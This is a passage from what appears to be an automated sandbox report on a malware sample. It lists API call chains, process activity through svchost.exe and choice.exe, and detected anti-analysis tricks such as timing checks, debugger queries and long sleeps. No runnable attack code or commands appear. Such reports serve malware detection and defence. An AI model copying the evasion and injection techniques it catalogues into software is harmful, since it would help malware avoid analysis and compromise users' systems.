choice.exe, 00000005.00000003.705380810389.0000000004DC3000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: 8EhMjL3yNF.exe, 00000000.00000003.703520236870.0000000004800000.00000004.00001000.00020000.00000000.sdmp, 8EhMjL3yNF.exe, 00000000.00000003.703518152149.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.705378005011.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.705288151288.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.705378005011.000000000372D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.705284845460.0000000003200000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000005.00000002.708579944136.0000000004F70000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000005.00000002.708579944136.000000000509D000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000005.00000003.705377011026.0000000004C19000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000005.00000003.705380810389.0000000004DC3000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: choice.exe, 00000005.00000002.708581961090.00000000055DC000.00000004.10000000.00040000.00000000.sdmp, choice.exe, 00000005.00000002.708575105258.0000000003155000.00000004.00000020.00020000.00000000.sdmp, SjhnWvlTMw.exe, 00000006.00000002.708580526921.0000000002FBC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.705676368924.000000003C50C000.00000004.80000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: choice.exe, 00000005.00000002.708581961090.00000000055DC000.00000004.10000000.00040000.00000000.sdmp, choice.exe, 00000005.00000002.708575105258.0000000003155000.00000004.00000020.00020000.00000000.sdmp, SjhnWvlTMw.exe, 00000006.00000002.708580526921.0000000002FBC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.705676368924.000000003C50C000.00000004.80000000.00040000.00000000.sdmp
          Source: Binary string: choice.pdb source: svchost.exe, 00000002.00000003.705345811797.000000000302B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.705345727655.000000000301A000.00000004.00000020.00020000.00000000.sdmp, SjhnWvlTMw.exe, 00000004.00000003.707411095047.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
          Source: 8EhMjL3yNF.exe | Static PE information: real checksum: 0xa961f should be: 0x147438
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402040 push ebp; iretd 2_2_00402041
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040B827 push ebp; ret 2_2_0040B82C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041E905 push ebx; retf 2_2_0041E928
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040D1B2 push esp; iretd 2_2_0040D1C9
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A254 push es; retf 2_2_0041A262
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00406365 push ss; iretd 2_2_00406366
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402381 push ds; retf 2_2_00402389
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004034F0 push eax; ret 2_2_004034F2
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401480 push edx; retn AE6Ch 2_2_00401938
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004187F3 push ds; ret 2_2_00418803
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036308CD push ecx; mov dword ptr [esp], ecx 2_2_036308D6
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe | Code function: 4_2_03FE8E71 push eax; ret 4_2_03FE8E73
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe | Code function: 4_2_03FE89B5 push edx; retf 4_2_03FE89B6
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe | Code function: 4_2_03FE7488 push ecx; ret 4_2_03FE7490
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\choice.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\choice.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\choice.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\choice.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\choice.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | API/Special instruction interceptor: Address: 440323C
          Source: C:\Windows\SysWOW64\choice.exe | API/Special instruction interceptor: Address: 7FFA0FFCD144
          Source: C:\Windows\SysWOW64\choice.exe | API/Special instruction interceptor: Address: 7FFA0FFCD604
          Source: C:\Windows\SysWOW64\choice.exe | API/Special instruction interceptor: Address: 7FFA0FFCD764
          Source: C:\Windows\SysWOW64\choice.exe | API/Special instruction interceptor: Address: 7FFA0FFCD324
          Source: C:\Windows\SysWOW64\choice.exe | API/Special instruction interceptor: Address: 7FFA0FFCD364
          Source: C:\Windows\SysWOW64\choice.exe | API/Special instruction interceptor: Address: 7FFA0FFCD004
          Source: C:\Windows\SysWOW64\choice.exe | API/Special instruction interceptor: Address: 7FFA0FFCFF74
          Source: C:\Windows\SysWOW64\choice.exe | API/Special instruction interceptor: Address: 7FFA0FFCD864
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03671763 rdtsc 2_2_03671763
          Source: C:\Windows\SysWOW64\choice.exe | Window / User API: threadDelayed 9193
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-87307
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | API coverage: 3.7 %
          Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.8 %
          Source: C:\Windows\SysWOW64\choice.exe TID: 4188 | Thread sleep count: 120 > 30
          Source: C:\Windows\SysWOW64\choice.exe TID: 4188 | Thread sleep time: -240000s >= -30000s
          Source: C:\Windows\SysWOW64\choice.exe TID: 4188 | Thread sleep count: 9193 > 30
          Source: C:\Windows\SysWOW64\choice.exe TID: 4188 | Thread sleep time: -18386000s >= -30000s
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe TID: 4416 | Thread sleep time: -70000s >= -30000s
          Source: C:\Windows\SysWOW64\choice.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\choice.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,0_2_004788BD
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_0044BD27 FindFirstFileW,CopyFileW,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_0044BF8B FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
          Source: firefox.exe, 00000008.00000002.705677467290.00000204FC56C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllNNe
          Source: choice.exe, 00000005.00000002.708575105258.0000000003155000.00000004.00000020.00020000.00000000.sdmp, SjhnWvlTMw.exe, 00000006.00000002.708578065752.000000000107F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | API call chain: ExitProcess graph end node graph_0-86434
          Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\choice.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03671763 rdtsc 2_2_03671763
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417383 LdrLoadDll,2_2_00417383
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_0045A370 BlockInput,0_2_0045A370
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_044034A8 mov eax, dword ptr fs:[00000030h] 0_2_044034A8
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_04403508 mov eax, dword ptr fs:[00000030h] 0_2_04403508
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_04401EB8 mov eax, dword ptr fs:[00000030h] 0_2_04401EB8
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363B360 mov eax, dword ptr fs:[00000030h] 2_2_0363B360
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363B360 mov eax, dword ptr fs:[00000030h] 2_2_0363B360
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363B360 mov eax, dword ptr fs:[00000030h] 2_2_0363B360
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363B360 mov eax, dword ptr fs:[00000030h] 2_2_0363B360
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363B360 mov eax, dword ptr fs:[00000030h] 2_2_0363B360
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363B360 mov eax, dword ptr fs:[00000030h] 2_2_0363B360
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366E363 mov eax, dword ptr fs:[00000030h] 2_2_0366E363
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366E363 mov eax, dword ptr fs:[00000030h] 2_2_0366E363
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366E363 mov eax, dword ptr fs:[00000030h] 2_2_0366E363
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366E363 mov eax, dword ptr fs:[00000030h] 2_2_0366E363
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366E363 mov eax, dword ptr fs:[00000030h] 2_2_0366E363
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366E363 mov eax, dword ptr fs:[00000030h] 2_2_0366E363
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366E363 mov eax, dword ptr fs:[00000030h] 2_2_0366E363
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366E363 mov eax, dword ptr fs:[00000030h] 2_2_0366E363
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036AE372 mov eax, dword ptr fs:[00000030h] 2_2_036AE372
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036AE372 mov eax, dword ptr fs:[00000030h] 2_2_036AE372
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036AE372 mov eax, dword ptr fs:[00000030h] 2_2_036AE372
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036AE372 mov eax, dword ptr fs:[00000030h] 2_2_036AE372
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B0371 mov eax, dword ptr fs:[00000030h] 2_2_036B0371
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B0371 mov eax, dword ptr fs:[00000030h] 2_2_036B0371
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365237A mov eax, dword ptr fs:[00000030h] 2_2_0365237A
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03628347 mov eax, dword ptr fs:[00000030h] 2_2_03628347
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03628347 mov eax, dword ptr fs:[00000030h] 2_2_03628347
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03628347 mov eax, dword ptr fs:[00000030h] 2_2_03628347
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366A350 mov eax, dword ptr fs:[00000030h] 2_2_0366A350
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03668322 mov eax, dword ptr fs:[00000030h] 2_2_03668322
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03668322 mov eax, dword ptr fs:[00000030h] 2_2_03668322
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03668322 mov eax, dword ptr fs:[00000030h] 2_2_03668322
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03703336 mov eax, dword ptr fs:[00000030h] 2_2_03703336
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365332D mov eax, dword ptr fs:[00000030h] 2_2_0365332D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362E328 mov eax, dword ptr fs:[00000030h] 2_2_0362E328
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362E328 mov eax, dword ptr fs:[00000030h] 2_2_0362E328
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362E328 mov eax, dword ptr fs:[00000030h] 2_2_0362E328
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03629303 mov eax, dword ptr fs:[00000030h] 2_2_03629303
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03629303 mov eax, dword ptr fs:[00000030h] 2_2_03629303
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036EF30A mov eax, dword ptr fs:[00000030h] 2_2_036EF30A
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B330C mov eax, dword ptr fs:[00000030h] 2_2_036B330C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B330C mov eax, dword ptr fs:[00000030h] 2_2_036B330C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B330C mov eax, dword ptr fs:[00000030h] 2_2_036B330C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B330C mov eax, dword ptr fs:[00000030h] 2_2_036B330C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364E310 mov eax, dword ptr fs:[00000030h] 2_2_0364E310
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364E310 mov eax, dword ptr fs:[00000030h] 2_2_0364E310
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364E310 mov eax, dword ptr fs:[00000030h] 2_2_0364E310
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366631F mov eax, dword ptr fs:[00000030h] 2_2_0366631F
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362E3C0 mov eax, dword ptr fs:[00000030h] 2_2_0362E3C0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362E3C0 mov eax, dword ptr fs:[00000030h] 2_2_0362E3C0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362E3C0 mov eax, dword ptr fs:[00000030h] 2_2_0362E3C0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362C3C7 mov eax, dword ptr fs:[00000030h] 2_2_0362C3C7
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036363CB mov eax, dword ptr fs:[00000030h] 2_2_036363CB
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036633D0 mov eax, dword ptr fs:[00000030h] 2_2_036633D0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036643D0 mov ecx, dword ptr fs:[00000030h] 2_2_036643D0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B43D5 mov eax, dword ptr fs:[00000030h] 2_2_036B43D5
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036393A6 mov eax, dword ptr fs:[00000030h] 2_2_036393A6
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036393A6 mov eax, dword ptr fs:[00000030h] 2_2_036393A6
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036AC3B0 mov eax, dword ptr fs:[00000030h] 2_2_036AC3B0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03631380 mov eax, dword ptr fs:[00000030h] 2_2_03631380
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03631380 mov eax, dword ptr fs:[00000030h] 2_2_03631380
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03631380 mov eax, dword ptr fs:[00000030h] 2_2_03631380
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03631380 mov eax, dword ptr fs:[00000030h] 2_2_03631380
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03631380 mov eax, dword ptr fs:[00000030h] 2_2_03631380
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364F380 mov eax, dword ptr fs:[00000030h] 2_2_0364F380
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364F380 mov eax, dword ptr fs:[00000030h] 2_2_0364F380
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364F380 mov eax, dword ptr fs:[00000030h] 2_2_0364F380
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364F380 mov eax, dword ptr fs:[00000030h] 2_2_0364F380
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364F380 mov eax, dword ptr fs:[00000030h] 2_2_0364F380
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364F380 mov eax, dword ptr fs:[00000030h] 2_2_0364F380
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036EF38A mov eax, dword ptr fs:[00000030h] 2_2_036EF38A
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365A390 mov eax, dword ptr fs:[00000030h] 2_2_0365A390
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365A390 mov eax, dword ptr fs:[00000030h] 2_2_0365A390
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365A390 mov eax, dword ptr fs:[00000030h] 2_2_0365A390
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362B273 mov eax, dword ptr fs:[00000030h] 2_2_0362B273
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362B273 mov eax, dword ptr fs:[00000030h] 2_2_0362B273
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362B273 mov eax, dword ptr fs:[00000030h] 2_2_0362B273
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C327E mov eax, dword ptr fs:[00000030h] 2_2_036C327E
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C327E mov eax, dword ptr fs:[00000030h] 2_2_036C327E
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C327E mov eax, dword ptr fs:[00000030h] 2_2_036C327E
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C327E mov eax, dword ptr fs:[00000030h] 2_2_036C327E
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C327E mov eax, dword ptr fs:[00000030h] 2_2_036C327E
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C327E mov eax, dword ptr fs:[00000030h] 2_2_036C327E
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036ED270 mov eax, dword ptr fs:[00000030h] 2_2_036ED270
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F124C mov eax, dword ptr fs:[00000030h] 2_2_036F124C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F124C mov eax, dword ptr fs:[00000030h] 2_2_036F124C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F124C mov eax, dword ptr fs:[00000030h] 2_2_036F124C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F124C mov eax, dword ptr fs:[00000030h] 2_2_036F124C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036EF247 mov eax, dword ptr fs:[00000030h] 2_2_036EF247
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365F24A mov eax, dword ptr fs:[00000030h] 2_2_0365F24A
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B0227 mov eax, dword ptr fs:[00000030h] 2_2_036B0227
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B0227 mov eax, dword ptr fs:[00000030h] 2_2_036B0227
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B0227 mov eax, dword ptr fs:[00000030h] 2_2_036B0227
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366A22B mov eax, dword ptr fs:[00000030h] 2_2_0366A22B
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366A22B mov eax, dword ptr fs:[00000030h] 2_2_0366A22B
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366A22B mov eax, dword ptr fs:[00000030h] 2_2_0366A22B
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03650230 mov ecx, dword ptr fs:[00000030h] 2_2_03650230
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362A200 mov eax, dword ptr fs:[00000030h] 2_2_0362A200
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362821B mov eax, dword ptr fs:[00000030h] 2_2_0362821B
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036BB214 mov eax, dword ptr fs:[00000030h] 2_2_036BB214
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036BB214 mov eax, dword ptr fs:[00000030h] 2_2_036BB214
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036272E0 mov eax, dword ptr fs:[00000030h] 2_2_036272E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363A2E0 mov eax, dword ptr fs:[00000030h] 2_2_0363A2E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363A2E0 mov eax, dword ptr fs:[00000030h] 2_2_0363A2E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363A2E0 mov eax, dword ptr fs:[00000030h] 2_2_0363A2E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363A2E0 mov eax, dword ptr fs:[00000030h] 2_2_0363A2E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363A2E0 mov eax, dword ptr fs:[00000030h] 2_2_0363A2E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363A2E0 mov eax, dword ptr fs:[00000030h] 2_2_0363A2E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036382E0 mov eax, dword ptr fs:[00000030h] 2_2_036382E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036382E0 mov eax, dword ptr fs:[00000030h] 2_2_036382E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036382E0 mov eax, dword ptr fs:[00000030h] 2_2_036382E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036382E0 mov eax, dword ptr fs:[00000030h] 2_2_036382E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362D2EC mov eax, dword ptr fs:[00000030h] 2_2_0362D2EC
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362D2EC mov eax, dword ptr fs:[00000030h] 2_2_0362D2EC
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036402F9 mov eax, dword ptr fs:[00000030h] 2_2_036402F9
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036402F9 mov eax, dword ptr fs:[00000030h] 2_2_036402F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402F9 mov eax, dword ptr fs:[00000030h]2_2_036402F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402F9 mov eax, dword ptr fs:[00000030h]2_2_036402F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402F9 mov eax, dword ptr fs:[00000030h]2_2_036402F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402F9 mov eax, dword ptr fs:[00000030h]2_2_036402F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402F9 mov eax, dword ptr fs:[00000030h]2_2_036402F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402F9 mov eax, dword ptr fs:[00000030h]2_2_036402F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036532C5 mov eax, dword ptr fs:[00000030h]2_2_036532C5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036632C0 mov eax, dword ptr fs:[00000030h]2_2_036632C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036632C0 mov eax, dword ptr fs:[00000030h]2_2_036632C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037032C9 mov eax, dword ptr fs:[00000030h]2_2_037032C9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EF2AE mov eax, dword ptr fs:[00000030h]2_2_036EF2AE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F92AB mov eax, dword ptr fs:[00000030h]2_2_036F92AB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036542AF mov eax, dword ptr fs:[00000030h]2_2_036542AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036542AF mov eax, dword ptr fs:[00000030h]2_2_036542AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370B2BC mov eax, dword ptr fs:[00000030h]2_2_0370B2BC
